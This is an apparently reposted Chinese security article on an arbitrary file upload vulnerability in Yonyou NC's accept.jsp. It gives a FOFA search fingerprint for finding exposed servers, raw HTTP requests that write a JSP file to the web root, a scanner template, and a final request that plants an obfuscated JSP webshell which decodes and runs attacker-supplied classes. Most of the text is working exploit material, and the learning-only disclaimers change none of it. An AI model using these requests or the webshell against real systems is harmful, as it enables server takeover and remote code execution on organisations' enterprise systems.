#yi
message
用友NC是大型企业管理与电子商务平台,帮助企业实现管理转型升级全面从以产品为中心转向以客户为中心(C2B);从流程驱动转向数据驱动(DDE);从延时运行转为实时运行(RTE);从领导指挥到员工创新(E2M)。用友NC accept.jsp处存在任意文件上传漏洞,攻击者通过漏洞可以获取网站权限,导致服务器失陷。
#er
showtime
步骤一:使用以下语法对用友NC的产品进行资产搜索...
# FOFa语法
icon_hash="1085941792"
步骤二:访问以上漏洞测试目标并开启浏览器代理与BP进行抓包改包操作...如下!
POST /aim/equipmap/accept.jsp HTTP/1.1
Host:IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: *****************
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Length: 383
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="flnb.txt"
Content-Type: text/plain
<% out.println("flnb666"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"
webappsnc_webflnb.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
步骤三:访问上传的文件即flnb.jsp
可看到上传成功的文件内容!
#san
scan
id: yonyou-nc-accept-fileupload
info:
name: 用友NC accept.jsp任意文件上传漏洞
author: fl
severity: critical
description: |
accept.jsp处存在任意文件上传漏洞,攻击者通过漏洞可以获取网站权限,导致服务器失陷。
reference:
none
metadata:
verified: true
2 :
icon_hash="1085941792" :
tags: yonyou,nc,fileupload,2023
variables:
boundary: '{{rand_base(29)}}'
http:
raw:
|
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: {{Hostname}}
Accept: */*
multipart/form-data; boundary=---------------------------{{boundary}} :
gzip :
-----------------------------{{boundary}}
form-data; name="upload"; filename="{{randstr_1}}.txt" :
text/plain :
out.println("{{randstr_2}}"); %>
-----------------------------{{boundary}}
form-data; name="fname" :
webappsnc_web{{randstr_3}}.jsp
-----------------------------{{boundary}}--
|
GET /{{randstr_3}}.jsp HTTP/1.1
Host: {{Hostname}}
application/x-www-form-urlencoded :
gzip :
true :
matchers:
type: dsl
dsl:
"status_code_1 == 200"
"status_code_2 == 200 && contains(body_2,'{{randstr_2}}')"
condition: and
#si
shell
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie:****************
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Length: 1211
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="flnb.txt"
Content-Type: text/plain
<% String Hk462 = request.getParameter("chong");if (Hk462 != null) { class E893231a extends/*Zga2h2W117*/ClassLoader { E893231a(ClassLoader L2TMNL) { super(L2TMNL); } public Class Hk462(byte[] b) { return super.defineClass(b, 0, b.length);}}int[] aa = new int[]{99, 101, 126, 62, 125, 121, 99, 115, 62, 82, 81, 67, 85, 38, 36, 84, 117, 115, 127, 116, 117, 98}; String ccstr = "";for (int i = 0; i < aa.length; i++) {aa[i] = aa[i] ^ 0x010; ccstr = ccstr + (char) aa[i];}Class A2jW8 = Class.forName(ccstr);String k = new String(new byte[]{100,101,99,111,100,101,66,117,102,102,101,114});byte[] bytes = (byte[]) A2jW8.getMethod(k, String.class).invoke(A2jW8.newInstance(), Hk462);Class aClass = new E893231a(Thread.currentThread().getContextClassLoader()).Hk462(bytes);Object o = aClass.newInstance();o.equals(pageContext);} else {response.sendError(404);} %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"
webappsnc_webflnb.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
揽月安全团队发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!!!!!
扫码获取更多精彩
原文始发于微信公众号(揽月安全团队):用友N-accept.jsp文件上传漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论